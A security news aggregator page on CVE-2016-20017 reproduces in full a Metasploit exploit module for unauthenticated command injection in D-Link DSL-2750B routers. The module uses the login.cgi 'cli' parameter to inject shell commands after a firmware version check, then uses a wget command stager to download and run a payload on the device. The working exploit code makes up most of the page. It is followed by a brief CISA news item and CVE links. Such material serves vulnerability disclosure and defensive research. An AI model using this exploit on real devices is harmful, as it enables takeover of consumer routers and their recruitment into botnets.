Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2016-20017: Offensive Security’s Exploit Database Archive

D-Link DSL-2750B devices before 1.05 allow remote unauthenticated command injection via the login.cgi cli parameter, as exploited in the wild in 2016 through 2022.

CVE
#vulnerability#web#linux#js#git#auth
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = GreatRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::CmdStager

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'D-Link DSL-2750B OS Command Injection',
      'Description'    => %q(
        This module exploits a remote command injection vulnerability in D-Link DSL-2750B devices.
        Vulnerability can be exploited through "cli" parameter that is directly used to invoke
        "ayecli" binary. Vulnerable firmwares are from 1.01 up to 1.03.
      ),
      'Author'         =>
        [
          'p@ql', # vulnerability discovery
          'Marcin Bury <marcin[at]threat9.com>' # metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          ['PACKETSTORM', 135706],
          ['URL', 'http://seclists.org/fulldisclosure/2016/Feb/53'],
          ['URL', 'http://www.quantumleap.it/d-link-router-dsl-2750b-firmware-1-01-1-03-rce-no-auth/']
        ],
      'Targets'        =>
        [
          [
            'Linux mipsbe Payload',
            {
              'Arch' => ARCH_MIPSBE,
              'Platform' => 'linux'
            }
          ],
          [
            'Linux mipsel Payload',
            {
              'Arch' => ARCH_MIPSLE,
              'Platform' => 'linux'
            }
          ]
        ],
      'DisclosureDate'  => 'Feb 5 2016',
      'DefaultTarget'   => 0))

    deregister_options('CMDSTAGER::FLAVOR')
  end

  def check
    res = send_request_cgi(
      'method' => 'GET',
      'uri' => '/ayefeaturesconvert.js'
    )

    unless res
      vprint_error('Connection failed')
      return CheckCode::Unknown
    end

    unless res.code.to_i == 200 && res.body.include?('DSL-2750')
      vprint_status('Remote host is not a DSL-2750')
      return CheckCode::Safe
    end

    if res.body =~ /var AYECOM_FWVER="(\d.\d+)";/
      version = Regexp.last_match[1]
      vprint_status("Remote host is a DSL-2750B with firmware version #{version}")
      if version >= "1.01" && version <= "1.03"
        return Exploit::CheckCode::Appears
      end
    end

    CheckCode::Safe
  rescue ::Rex::ConnectionError
    vprint_error('Connection failed')
    return CheckCode::Unknown
  end

  def execute_command(cmd, _opts)
    payload = Rex::Text.uri_encode("multilingual show';#{cmd}'")
    send_request_cgi(
      {
        'method' => 'GET',
        'uri' => '/login.cgi',
        'vars_get' => {
          'cli' => "#{payload}$"
        },
        'encode_params' => false
      },
      5
    )
  rescue ::Rex::ConnectionError
    fail_with(Failure::Unreachable, "#{peer} Failed to connect to the web server")
  end

  def exploit
    print_status("#{peer} Checking target version...")

    unless check == Exploit::CheckCode::Appears
      fail_with(Failure::NotVulnerable, 'Target is not vulnerable')
    end

    execute_cmdstager(
      flavor: :wget,
      linemax: 200
    )
  end
end

Related news

CISA Flags 6 Vulnerabilities - Apple, Apache, Adobe , D-Link, Joomla Under Attack

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added six security flaws to its Known Exploited Vulnerabilities (KEV) catalog, citing evidence of active exploitation. This includes CVE-2023-27524 (CVSS score: 8.9), a high-severity vulnerability impacting the Apache Superset open-source data visualization software that could enable remote code execution.

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE-2023-6905
CVE-2023-6903
CVE-2023-6904
CVE-2023-3907